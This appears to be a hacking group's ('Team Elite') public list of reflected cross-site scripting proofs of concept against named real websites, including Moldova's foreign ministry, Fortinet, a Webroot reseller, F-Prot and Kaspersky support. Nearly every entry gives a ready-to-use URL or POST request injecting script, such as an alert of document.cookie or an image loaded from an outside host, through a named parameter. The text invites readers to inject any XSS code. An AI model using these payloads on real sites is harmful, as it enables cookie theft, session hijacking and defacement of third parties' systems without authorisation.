Ministry of Foreign Affairs and European Integration of the RM - XSS
Vulnerable page: http://www.mfa.gov.md/search-result-form/PoC:
Code
http://www.mfa.gov.md/search-result-form/?quotes=1&q="><h1>XSS found by Team Elite</h1>
Code
http://www.mfa.gov.md/search-result-form/?quotes=1&q="><img src=http://te-home.net/images/logo.png>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Fortiguard.com virus scanner submission form XSS bug
Vulnerable page: https://submission.fortinet.com/ @ http://www.fortiguard.com/PoC
POST /scanner.php HTTP/1.1Host: submission.fortinet.com
name="><img src=http://te-home.net/images/logo.png>
POST /scanner.php HTTP/1.1
Host: submission.fortinet.com
name="><script>alert(document.cookie)</script>
You can either include any XSS code in name input box, or request any XSS code directly using POST method and name parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Webroot (polish website) - XSS
Vulnerable page: http://wrpolska.pl/sklep/search.phpPoC:
Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><h1>XSS found by Team Elite</h1>
Code
http://wrpolska.pl/sklep/search.php?orderby=position&orderway=desc&search_query="><img src=http://te-home.net/images/logo.png>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and search_query parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
F-Prot Antivirus - XSS
Vulnerable page: https://www.f-prot.com/cgi-bin/buyYou can include any XSS code in required fields to reproduce the bug.
PoC:
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Kaspersky.com support page XSS bug
Vulnerable page: http://support.kaspersky.com/PoC
http://support.kaspersky.com/search?query="><img src=http://te-home.net/images/logo.png>http://support.kaspersky.com/search?query="><script>alert(document.cookie)</script>
You can either include any XSS code in search input box, or request any XSS code directly using GET method and query parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.